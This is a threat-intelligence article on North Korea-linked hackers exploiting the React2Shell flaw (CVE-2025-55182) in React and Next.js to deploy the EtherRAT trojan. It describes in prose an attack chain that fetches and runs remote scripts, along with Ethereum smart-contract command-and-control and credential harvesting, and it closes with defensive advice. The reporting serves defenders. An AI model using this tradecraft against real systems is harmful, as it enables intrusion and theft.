North Korea-Linked Hackers Exploit React2Shell to Deploy New EtherRAT Malware

North Korea-linked threat actors have become the latest group to weaponize the React2Shell vulnerability (CVE-2025-55182) to compromise modern JavaScript applications and deploy a new remote access trojan known as EtherRAT. This flaw in React Server Components and Next.js allows unauthenticated remote code execution, giving attackers a direct path to run arbitrary commands on vulnerable servers with a CVSS score of 10.0 that reflects its critical impact.​

What is React2Shell?
React2Shell is the nickname for CVE-2025-55182, a critical RCE vulnerability in the React Server Components “Flight” protocol that affects React 19 and popular frameworks like Next.js. Because the bug stems from insecure deserialization in default configurations, even standard production builds created via tools like create-next-app can be exploitable without any custom application changes. Successful exploitation lets remote attackers send crafted HTTP requests to execute Base64-encoded shell commands on the server, making it ideal for rapid initial access and malware deployment at scale.​

Inside EtherRAT’s toolkit
EtherRAT is a previously undocumented remote access trojan that leverages Ethereum smart contracts for command-and-control resolution, providing decentralized, takedown-resistant infrastructure. Once deployed, it sets up five distinct Linux persistence mechanisms, downloads its own Node.js runtime from nodejs.org, and runs a JavaScript-based implant that can update itself and load additional payloads. This design not only makes EtherRAT portable across various Linux environments but also blends its activity into legitimate web and blockchain workflows, complicating detection for defenders.​

Links to Contagious Interview and EtherHiding
Researchers have observed strong overlaps between EtherRAT activity and the “Contagious Interview” campaign, a long-running DPRK operation that targets blockchain and Web3 developers through fake recruiter profiles and job interviews on platforms such as LinkedIn, Upwork, and Fiverr. Previous waves of this campaign abused the npm ecosystem with hundreds of malicious packages and used techniques like EtherHiding, where attacker infrastructure and configuration details are stored in Ethereum smart contracts to evade takedowns. The move to exploit React2Shell shows the same actors adapting quickly to front-end and cloud-native stacks, aligning their tradecraft with JavaScript-heavy development environments.​

How the attack chain works
In the observed attacks, the chain starts with exploitation of CVE-2025-55182 via a crafted HTTP request that triggers a Base64-encoded shell command on the target React Server Components environment. That command downloads and runs a shell script, which in turn retrieves the main JavaScript-based EtherRAT implant, deploys persistence, and configures Ethereum smart contract-based C2 endpoints used for tasking and updates. Some reported incidents also involve follow-on objectives such as harvesting cloud credentials, pivoting into CI/CD infrastructure, and building botnets for broader campaigns.​

Defensive steps for React and Web3 teams
For organizations building on React and Next.js, immediate patching and framework updates for CVE-2025-55182 should be treated as an emergency task, with WAF rules and temporary IP filtering as short-term compensating controls where patching is delayed. Security teams supporting blockchain and Web3 developers should tighten npm package vetting, restrict execution of untrusted VS Code projects, and implement strict egress controls to monitor and flag suspicious connections to Ethereum RPC endpoints and smart contracts. Finally, developer-facing security awareness must address fake recruiter lures and malicious “coding tasks,” which remain a central social-engineering vector in Contagious Interview and its EtherRAT-driven variants.